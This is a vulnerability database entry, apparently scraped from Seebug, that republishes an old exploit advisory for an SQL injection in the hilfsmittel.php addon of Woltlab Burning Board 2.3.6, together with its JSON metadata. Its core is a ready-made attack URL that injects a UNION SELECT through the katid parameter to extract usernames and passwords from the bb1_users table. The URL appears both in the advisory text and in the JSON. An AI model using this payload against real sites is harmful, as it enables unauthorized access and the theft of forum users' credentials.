Search...

Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability

2014-07-01T00:00:00

ID SSV:70735
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #####################################################################################

 &#62; Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability &#60;

#####################################################################################

[+] Autor: Crazyball
[+] Vulnerabilities [ SQL Injection ]
[+] Page: http://www.euweb.at/
[+] Language: [ PHP ]
[+] Version: Hilfsmitteldatenbank 1.0 
[+] Date: n/a
[+] Vendor: http://www.woltlab.com/de/

##########################################################################################

[+] Vulnerability

 hilfsmittel.php?action=read&katid=


[+] Exploitable

 http://[host]/[path]/hilfsmittel.php?action=read&katid=5&#39;/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T17:04:07", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T17:04:07", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T17:04:07", "rev": 2}, "vulnersScore": 0.1}, "href": "https://www.seebug.org/vuldb/ssvid-70735", "references": [], "enchantments_done": [], "id": "SSV:70735", "title": "Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n #####################################################################################\r\n\r\n > Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability <\r\n\r\n#####################################################################################\r\n\r\n[+] Autor: Crazyball\r\n[+] Vulnerabilities [ SQL Injection ]\r\n[+] Page: http://www.euweb.at/\r\n[+] Language: [ PHP ]\r\n[+] Version: Hilfsmitteldatenbank 1.0 \r\n[+] Date: n/a\r\n[+] Vendor: http://www.woltlab.com/de/\r\n\r\n##########################################################################################\r\n\r\n[+] Vulnerability\r\n\r\n hilfsmittel.php?action=read&katid=\r\n\r\n\r\n[+] Exploitable\r\n\r\n http://[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70735", "type": "seebug"}